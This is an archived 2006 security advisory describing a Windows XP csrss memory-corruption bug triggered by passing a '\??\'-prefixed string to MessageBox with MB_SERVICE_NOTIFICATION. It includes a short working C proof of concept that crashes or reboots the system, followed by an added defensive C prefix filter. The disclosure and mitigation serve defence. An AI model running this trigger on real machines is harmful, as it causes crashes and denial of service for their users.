Microsoft Windows csrss (?) memory corruption exploited in-the-wild

SECURITYVULNS:DOC:15469
Dec 16, 2006
Source: vulners.com

Dear [email protected],

On one of the Russian forums a security vulnerability in Microsoft Windows is
being discussed (tested on Windows XP). The vulnerability is caused by memory
corruption when a string beginning with "\?\" is sent through the MessageBox
API with the MB_SERVICE_NOTIFICATION flag. It looks like some "debug" feature
that was not cleaned out of the final release, and it seems to be exploitable
for code execution at kernel level. Code example below:

#include <stdio.h>
#include <windows.h>

/* PoC from the post: a text/caption string starting with the NT object
 * namespace prefix "\??\" is passed to MessageBox with
 * MB_SERVICE_NOTIFICATION. That flag asks the system to display the box
 * on the active desktop even when the caller (typically a service) has
 * no interactive desktop of its own. The post issues the call ten times. */
int main(void)
{
    int i;
    char bug1[] = "\\??\\XXXX";   /* "\??\XXXX" after C escaping */

    for (i = 0; i < 10; i++) {
        /* MessageBoxA: explicit ANSI variant so this builds with or without UNICODE */
        MessageBoxA(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
    }
    return 0;
}

System hangs, crashes (BSOD) or reboots.


http://www.security.nnov.ru
          /\_/\
         { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA U 3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                      |/
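As an added example (not code from the original post, and not a fix from Microsoft): a guard a service author could put in front of MessageBox with MB_SERVICE_NOTIFICATION while the bug is unpatched, refusing any text or caption that starts with the NT object-manager prefix the PoC uses. The prefix list, the function names has_nt_path_prefix and service_notify_safe, and the off-Windows print stand-in are assumptions made for illustration; the sample strings are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Case-insensitive "does s start with prefix" (stops at the end of either string). */
static int starts_with_nocase(const char *s, const char *prefix)
{
    for (; *prefix != '\0'; s++, prefix++) {
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    }
    return 1;
}

/* Returns 1 if text (after leading whitespace) begins with an NT object-manager
 * or Win32 extended-path prefix. The prefix list is an assumption for this
 * example: "\??\" is the trigger from the post; the others are related
 * namespace forms a defender would refuse on the same grounds. */
int has_nt_path_prefix(const char *text)
{
    static const char *const prefixes[] = {
        "\\??\\",        /* \??\       : NT DosDevices symlink namespace (the PoC's prefix) */
        "\\GLOBAL??\\",  /* \GLOBAL??\ : global DosDevices directory */
        "\\Device\\",    /* \Device\   : raw NT device path */
        "\\\\?\\",       /* \\?\       : Win32 extended-length path */
        "\\\\.\\",       /* \\.\       : Win32 device namespace */
    };
    size_t i;

    if (text == NULL)
        return 0;
    while (*text == ' ' || *text == '\t' || *text == '\r' || *text == '\n')
        text++;
    for (i = 0; i < sizeof prefixes / sizeof prefixes[0]; i++)
        if (starts_with_nocase(text, prefixes[i]))
            return 1;
    return 0;
}

/* Guarded replacement for MessageBox(..., MB_SERVICE_NOTIFICATION).
 * Returns 0 if either string is refused, 1 if the notification was issued.
 * On Windows this calls MessageBoxA; elsewhere it prints the message as a
 * stand-in so the check can be exercised off-Windows (assumption for the example). */
int service_notify_safe(const char *text, const char *caption)
{
    if (has_nt_path_prefix(text) || has_nt_path_prefix(caption))
        return 0;
#ifdef _WIN32
    return MessageBoxA(NULL, text, caption,
                       MB_OK | MB_SERVICE_NOTIFICATION) != 0;
#else
    printf("[service notification] %s: %s\n", caption, text);
    return 1;
#endif
}

int main(void)
{
    /* Constructed sample inputs: the PoC string from the post and a benign one. */
    const char *bad = "\\??\\XXXX";
    const char *good = "Backup job finished";

    printf("PoC string refused: %s\n",
           service_notify_safe(bad, bad) ? "no" : "yes");
    printf("benign string shown: %s\n",
           service_notify_safe(good, "Backup") ? "yes" : "no");
    return 0;
}
```

This blocks only the trigger the post describes; the corruption happens on the system side of the call, so the durable fix lies in the operating system, not in callers, and a service that displays attacker-influenced strings is better off dropping MB_SERVICE_NOTIFICATION than relying on a prefix filter.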